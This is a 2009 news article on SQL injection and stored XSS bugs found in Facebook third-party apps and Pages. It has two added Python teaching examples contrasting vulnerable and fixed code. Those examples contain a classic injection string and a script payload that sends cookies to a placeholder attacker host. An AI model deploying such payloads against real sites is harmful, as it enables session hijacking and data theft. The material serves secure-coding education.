    Social Networks Face Security Challenge from Third-Party Applications

    Written by

    Brian Prince
    Published February 18, 2009

      While changes to Facebook’s user license agreement have been in the news of late, another issue continues to nag Facebook and other social networks: the security of applications developed by third parties.

      The question of what to do with potentially malicious applications created by third parties for use on social networking sites is underscored by the recent findings of security researchers Nir Goldshlager and Rafel Ivgi.

      “The SQL injection we discovered is in two different applications in apps.facebook.com,” explained Goldshlager, who works for Citadel Technologies in Israel. “One of the servers is running as root. This means we can write files into the machine and with a high chance of executing code on it as root. In any case it is possible to obtain the same information about the users, as the application is able to get and insert new and even malicious information into the database.”
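      The bug class Goldshlager describes, as an added example that is not from the article, the researchers or the affected applications: a Python/sqlite3 lookup of the kind a third-party app might run against its own user table, first with the request parameter pasted into the query text and then with it bound as a parameter. The table, rows, column names and the attacker string are constructed for the demo.

```python
# Added example (not the article's or the researchers' code): the SQL injection
# anti-pattern beside the parameterized fix, on a constructed in-memory table.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for a third-party app's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app_users (uid INTEGER, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO app_users VALUES (?, ?, ?)",
        [
            (1001, "alice", "alice@example.com"),
            (1002, "bob", "bob@example.com"),
            (1003, "carol", "carol@example.com"),
        ],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, uid: str) -> list:
    """The defect: the uid taken from the request is concatenated into the SQL,
    so a quote plus an OR clause in it rewrites the WHERE condition."""
    query = f"SELECT uid, name, email FROM app_users WHERE uid = '{uid}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, uid: str) -> list:
    """The fix: the value travels as a bound parameter and is never parsed as SQL,
    so the same hostile string simply matches no row."""
    return conn.execute(
        "SELECT uid, name, email FROM app_users WHERE uid = ?", (uid,)
    ).fetchall()


def demo() -> dict:
    """Run both lookups with an honest uid and with a classic injection string."""
    conn = make_db()
    honest = "1001"
    hostile = "' OR '1'='1"  # constructed attacker input
    return {
        "vuln_honest": lookup_vulnerable(conn, honest),
        "vuln_hostile": lookup_vulnerable(conn, hostile),   # dumps every row
        "safe_honest": lookup_parameterized(conn, honest),
        "safe_hostile": lookup_parameterized(conn, hostile),  # matches nothing
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, "->", rows)
```

      Binding parameters closes the injection itself; the second half of Goldshlager's point, the server running as root, is a separate fix. Running the database and the application under an unprivileged account limits what a successful injection can do with file-writing and code-execution primitives, which is why the two findings compound each other.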

      On the subject of Facebook security, officials said fixing third-party applications is up to the developer.

      “Developer applications are hosted on third-party servers,” Ryan McGeehan, of Facebook’s security team, told eWEEK. “When security-related bugs arise in third-party applications, it’s the developer’s responsibility to get them fixed, as their code does not live on Facebook systems.”

      When Facebook receives reports about vulnerabilities in third-party applications, officials notify the developers immediately. In some cases, Facebook also disables or sandboxes applications until the developer has corrected the issue.

      Facebook Users Should Be Wary

      The developers of the two applications referred to by Goldshlager and Ivgi have both been contacted by Facebook, and remediation began immediately, McGeehan said. Neither application should be accessible, and the applications will be reviewed before they are enabled, he added.

      Still, the issue of third-party applications is a sticky one for social networking sites, which by their very nature encourage people to share. If developers aren’t creating secure code, or, worse yet, are intentionally building malicious applications, users could be at risk. To help address this, Facebook requires that developers agree to comply with policy guidelines prohibiting malicious activity before they can build on the site’s platforms.

      “We recommend that users add applications from companies or developers that they trust,” McGeehan said. “This is similar to how we recommend that users only add people they trust in real life. We also recommend that developers follow development standards for Web applications, such as the standards set by the Open Web Application Security Project … to avoid vulnerability. Users can also check out our help page for more information on applications.”

      In addition to the SQL injection bugs, Goldshlager and Ivgi also found a cross-site scripting vulnerability that has since been fixed. That vulnerability was in the Facebook pages mechanism. The duo found that a user can create a new page with arbitrary HTML code in the page’s name.

      The code is displayed only as text, and is not exploitable until a new message is created in the discussion section of the page and a reply is made to that message. The first reply to the topic executes the arbitrary code (the page’s name itself) because that view does not filter the HTML, Goldshlager explained. The result is a persistent, stored XSS inside Facebook that can hijack the session of any user who browses that page.

      “This is a complex case of input validation in a Web application, since the user’s input is always filtered to avoid executing free HTML code except from the one case of a reply to a topic in that Facebook page with the [malicious] page name,” Goldshlager said. “Facebook fixed the vulnerability by filtering the user input [the page’s name] also in the page where the first topic reply is displayed.”
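      The pattern behind the pages bug, as an added example that is not Facebook’s code: one stored value (the page name) rendered through several templates, one of which, a hypothetical first-reply view, interpolates it raw while every other view encodes it. The `audit_sinks` helper renders each template with a canary string and reports the ones that emit it unencoded, which is how a practitioner finds the single forgotten sink the quote describes. The templates, the payload and the reply text are constructed for the demo.

```python
# Added example (not Facebook's code): a stored page name rendered through
# several HTML templates, one of which forgot to encode it, plus a canary
# audit that finds the leaking sink.
from html import escape

# Constructed attacker-chosen page name: a session-stealing payload of the kind
# the article describes (attacker.example is a placeholder host).
MALICIOUS_PAGE_NAME = (
    '<script>new Image().src="https://attacker.example/c?"'
    "+encodeURIComponent(document.cookie)</script>"
)


def render_page_header(page_name: str) -> str:
    """Page title view: encodes the stored name, so the browser shows it as text."""
    return f"<h1>{escape(page_name)}</h1>"


def render_first_reply_vulnerable(page_name: str, reply_body: str) -> str:
    """Hypothetical first-reply view with the defect: the reply body is encoded,
    but the page name is interpolated raw into the HTML."""
    return f'<div class="reply">Re: {page_name}<p>{escape(reply_body)}</p></div>'


def render_first_reply_fixed(page_name: str, reply_body: str) -> str:
    """The fix the article describes: encode the page name at this sink too."""
    return (
        f'<div class="reply">Re: {escape(page_name)}'
        f"<p>{escape(reply_body)}</p></div>"
    )


# A canary that any HTML-context encoder must neutralise; if it survives
# unchanged in the output, the template writes the value into the page raw.
CANARY = '"><xss-canary>'


def audit_sinks(templates: dict) -> list:
    """Render every template with the canary and return the names of the ones
    that emit it unencoded. templates maps a name to a one-argument renderer."""
    leaking = []
    for name, render in templates.items():
        if CANARY in render(CANARY):
            leaking.append(name)
    return leaking


def page_templates() -> dict:
    """Every view that displays a page name, with a fixed reply body for the demo."""
    return {
        "page_header": render_page_header,
        "first_reply_vulnerable": lambda n: render_first_reply_vulnerable(n, "hi"),
        "first_reply_fixed": lambda n: render_first_reply_fixed(n, "hi"),
    }


def demo() -> dict:
    """Which views leak, and what the stored payload looks like at each sink."""
    return {
        "leaking_sinks": audit_sinks(page_templates()),
        "header": render_page_header(MALICIOUS_PAGE_NAME),
        "reply_vulnerable": render_first_reply_vulnerable(MALICIOUS_PAGE_NAME, "hi"),
        "reply_fixed": render_first_reply_fixed(MALICIOUS_PAGE_NAME, "hi"),
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(label, "->", value)
```

      The audit is the practical lesson of the quote: input validation at the point of storage cannot be relied on to protect every later view, so output encoding has to happen in each template that writes the value into HTML, and a canary run across all of them is a cheap way to prove that it does.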
